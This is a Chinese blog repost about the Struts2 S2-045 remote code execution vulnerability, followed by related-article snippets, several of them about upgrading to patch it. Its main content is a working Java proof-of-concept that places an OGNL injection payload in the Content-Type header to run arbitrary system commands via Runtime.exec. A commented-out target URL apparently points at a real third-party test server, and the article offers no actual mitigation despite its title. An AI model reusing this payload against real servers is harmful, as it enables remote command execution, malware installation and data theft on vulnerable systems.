Struts2 2.2 和 2.3 版本最新漏洞及攻击方法和防范教程

最新推荐文章于 2023-01-13 22:30:00 发布
最新推荐文章于 2023-01-13 22:30:00 发布
阅读量471 收藏
点赞数
文章标签: java javascript python ViewUI
原文链接:https://my.oschina.net/guopengfei/blog/857389
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

原文链接:Struts2 2.2 和 2.3 版本最新漏洞

据最新消息,Struts2 2.2 到 2.3.32以下版本存在严重漏洞,攻击者可以通过此漏洞攻击任意使用了这两个版本的Struts2系统,并在目标机器执行任意脚本。

该漏洞目前在Windows和Linux下均可以攻击,注入成功,即可在客户机下进行任意命令,包含安装木马,拦截目标机器数据,删除数据等等。

现贴出测试代码:

package com.blog.test;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.net.URLConnection;

public class TestGongji {

	
	static String url = "http://localhost:8080/Struts2Pro/";
	//static String url = "http://dwxt.test.chinaclear.cn/admin/login.action";

	public static void main(String[] args) {
		
		String rlt2 = sendPost(url, "1");
		System.out.println(rlt2);
	}
	
	private static String sendPost(String urlStr, String param) {
		String result = null;
		try {
			URL url = new URL(urlStr);
			URLConnection conn = url.openConnection();
			conn.setRequestProperty("accept", "*/*");
			conn.setRequestProperty("connection", "Keep-Alive");
			//conn.setRequestProperty("cookie", "0000sPhRUJJTfYf9d3TiPf6HTXW:1agu86nml");
//			conn.setRequestProperty("referer", "http://qqxt.test.chinaclear.cn/login.do");
			conn.setRequestProperty("Content-Type", "s-multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('cmd /c mkdir c:\\hello')};");
			conn.setDoOutput(true);
			conn.setDoInput(true);
			PrintWriter out = new PrintWriter(conn.getOutputStream());
			out.print(param);
			out.flush();
			
			BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
			String line = null;
			while ((line = in.readLine()) != null) {
				result += line;
			}
		} catch (Exception e) {
			e.printStackTrace();
		}
		
		return result;
	}
}

在此代码中,我们尝试攻击了本地的 一个叫做Struts2Pro的视图struts2项目,同时使用命令在攻击的目标机器中的C:/盘下创建一个hello的文件夹,执行后发现成功创建该文件夹。

转载于:https://my.oschina.net/guopengfei/blog/857389

weixin_33853794
关注
从数据包视角解析新型Struts2漏洞攻击全过程
weixin_34392435的博客
09-04 598
本文讲的是从数据包视角解析新型Struts2漏洞攻击全过程,万年漏洞Struts2作为世界上最流行的 Java Web 服务器框架之一,已经被炒得沸沸扬扬,其原因是由于 Apache Struts2 的 Jakarta Multipart parser 插件存在远程代码执行漏洞攻击者可以在使用该插件上传文件时,修改 HTTP 请求头中的 Conte...
Tomcat学习总结(15)—— Apache Tomcat各版本比较
科技D人生
04-14 1237
Apache Tomcat Versions Apache Tomcat®是java Servlet和JSP技术的一个开放源代码的软件实现。不同版本的Apache Tomcat可用于不同版本的servlet和JSP规范。规格和各自的Apache Tomcat版本之间的映射是: 每个版本的tomcat是任何稳定的java版本,满足最后一列的表中的上述要求的支持。 Tomcat也应该工作在任...
Struts2最新漏洞升级2.3.32版本
03-22
1、升级所需要的jar(见附件): freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar 2、删除上面原有的低版本jar 3、修改 WEB-INF\classes 目录下struts.xml 文件,加上: 这两行请不要加在外边。“加在这里”
struts2漏洞攻击一例
sam.ds.chen
07-20 279
怎样利用Struts2漏洞(2.0.0<=version<=2.3.15)搞垮一个基于Struts2写的网站?Strutsjava web frameworks里面的鼻祖了,现在大量的web apps里面,从政府网站到金融系统,都有她的影子(大量的系统都是采用一种被用烂了的SSH(Struts+Spring+Hibernate)组合来做的)。甚至阿里/淘宝也有一些系统使用了St...
Struts2简单入侵方法
kuxing100的专栏
07-10 1132
原文:http://page.renren.com/601190241/note/860441395 咳咳。。正题来了。上一篇文章基本都是抄别人的。。这篇文章自己写啦~猪头君让俺不要偷懒。于是菌菌就来更新啦!struts2执行漏洞攻击方式也不外乎两种,手工和工具【嘿嘿嘿。。本文就先讲工具吧。工具永远是最简单的。。目前我见过的攻击工具有两个,一个是工具猫魔盒中的struts利用。
Strut2 升级到 Struts 2.3.32 漏洞修复教程
天翔空水木的专栏
03-15 6628
Struts2 版本漏洞版本: CVE-2017-5638 受影响jar包: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 方案: 升级到 Struts 2.3.32 or Struts 2.5.10.1 具体步骤: 1、确认漏洞 自己项目是否使用其中漏洞受影响的
C 语言安全编程实践:防范常见攻击
针对 C 语言常见的安全漏洞,黑客常用的攻击手法包括堆栈溢出、格式化字符串漏洞、使用未经初始化的内存等。攻击者通过这些手法来修改程序的控制流,执行恶意代码或获取敏感信息。 ```c // 示例:堆栈溢出漏洞 #...
Fortify SCA检测Java程序问题及解决方法
han071530342的专栏
11-13 2873
一、输入验证 1.1 sql注入 SQL Injection Abstract 通过不可信来源的输入构建动态SQL指令,攻击者就能够修改指令的含义或者执行任意SQL命令。 Explanation SQL injection错误在以下情况下发生: 1.数据从一个不可信赖的数据源进入程序。 2.数据用于动态地构造一个SQL查询。 例1:以下代码动态地构造并执行...
【模板引擎安全攻略】:全面防御模板注入攻击的有效方法
[【模板引擎安全攻略】:全面防御模板注入攻击的有效方法](https://www.dailysecu.com/news/photo/202109/129317_152325_30.jpg) # 1. 模板注入攻击的原理与危害 ## 1.1 模板注入攻击的定义 模板注入攻击是一种...
Struts2 漏洞集合
最新发布
WLANQY的博客
01-13 2343
而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击。,但是,由于它只涉及参数的名称,因此结果是基于将可接受的参数名称列入白名单并拒绝评估参数中包含的表达式的结果修复名称,仅部分关闭了漏洞
struts2-2.2.1-all 版本
03-10
struts2-2.2.1-al 完整版本,目前这个版本不好找,分享给大家,原压缩包太大,重新给压缩成7z格式,7z,rar或360zip都可解压
struts2安全漏洞-升级struts2 jar文件从2.2.3至2.3.16
08-07
NULL 博文链接:https://javatea.iteye.com/blog/2100912
struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)
03-09
struts-2.3.32-all (含struts2-core-2.3.32.jar) 修补S2-045漏洞所有核心jar包及依赖的jar
struts2.3.35漏洞升级全部JAR包
06-27
struts漏洞升级全部JAR包,struts22.3.15.1升级到2.3.35相关配置说明,在附件中包含有2.3.15.1版本的jar包和2.3.35版本的jar包
struts2升级到2.3.32版本,防止漏洞编号S2-045,CVE编号:cve-2017-5638
xiao.yu的博客
03-09 6213
struts2升级到2.3.32版本,防止漏洞编号S2-045,CVE编号:cve-2017-5638
Struts2高位漏洞升级到struts2.3.32
淡墨银痕的博客
04-07 2454
Struts2高位漏洞升级到struts2.3.323月7日带来了一个高危漏洞Struts2漏洞——CVE编号CVE-2017-5638。其原因是由于Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。 升级jar包 更新这些jar包
Struts版本升级——安全漏洞版本2.3.32升级为2.5.22
我想靜靜
08-17 1930
struts2——一个web应用框架,目前很多新项目已不再使用。 但是很多老项目很可能是使用Strus2进行开发的。本人接触一个项目使用的但是Struts 2.3.32版本。因为安全漏洞扫描,发现很多安全问题。为了解决这些问题,需要对Struts2版本进行升级。 而版本升级有牵涉到项目中一系列的改动,都有哪些改动呢? Struts2版本2.3.32升级为2.5.22 1、struts2的jar包版本替换 找到项目的pom.xml文件, <dependency> <gro
struts2.2需要的jar
Holy0913的专栏
11-20 1126
1)  commons-fileupload-1.2.1.jar2)  commons-io-1.3.2.jar3)  freemarker-2.3.16.jar4)  javassist-3.7.ga.jar5)  ognl-3.0.jar6)  struts2-core-2.2.1.jar7)  xwork-core-2.2.1.jar
漏洞复现|Struts2系列漏洞复现总结
weixin_42282189的博客
11-03 2371
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 Struts2-045(CVE-2017-5683) 0x01 漏洞描述 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。 Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartR.
Struts2版本安全漏洞修复策略与防范措施
3. **升级依赖库**:虽然不是直接修复漏洞,但确保使用的Struts2及其相关库(如commons-fileupload、commons-io等)是最新版本,这些库通常包含了针对已知安全问题的修复。 4. **实施输入验证**:对用户提交的数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值